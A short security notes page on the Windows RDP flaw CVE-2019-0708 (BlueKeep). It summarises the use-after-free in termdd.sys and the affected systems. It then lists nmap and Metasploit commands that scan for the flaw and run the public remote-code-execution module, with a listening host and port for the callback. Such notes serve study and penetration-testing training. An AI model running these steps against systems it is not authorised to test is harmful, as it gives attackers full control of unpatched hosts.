CVE-2019-0708: BlueKeep

Microsoft Operating Systems BlueKeep Vulnerability | CISACybersecurity and Infrastructure Security Agency CISA

Security Update Guide - Microsoft Security Response Centermsrc.microsoft.com

BlueKeep is a critical RDP vulnerability in Windows systems that allows attackers to remotely execute arbitrary code without authentication, potentially gaining full access to the system and network. Disclosed by Microsoft in May 2019, the exploit targets the RDP protocol, exploiting a flaw in kernel memory. A patch was released on May 14, 2019, but many systems, including Windows XP, Vista, 7, and Server 2008 R2, remained vulnerable at the time. Over 1 million systems worldwide were at risk when the vulnerability was discovered.

NVD - cve-2019-0708nvd.nist.gov

Why the Vulnerability Occurs

The vulnerability in question affects Microsoft’s Remote Desktop Services (formerly Terminal Services), which allows users to remotely access a Windows system using the Remote Desktop Protocol (RDP) over port 3389/TCP. The exploit leverages a flaw in the "MCS Connect Initial and GCC Create" request, part of the RDP connection sequence. Specifically, it targets the creation of virtual channels, where a use-after-free vulnerability in the RDP kernel driver (termdd.sys) can be exploited by sending crafted data to the "MS_T120" channel. This results in arbitrary code execution with administrative privileges.

Zero Day Initiative — CVE-2019-0708: A Comprehensive Analysis of a Remote Desktop Services VulnerabilityZero Day Initiative

Exploitation

MSF

# enumeration with nmap
sudo nmap -Pn -sV -O [IP]

# vulnerability scan
msfconsole -q
search bluekeep
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
show options
set RHOSTS [IP]
run

# exploitation (only works in x64)
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
show options
set RHOSTS [IP]
set LHOST [Listening IP]
set LPORT [Listening Port]
# Exploit may fail for Bad Config. Manually configure targets.
show targets 
select target [target name]
run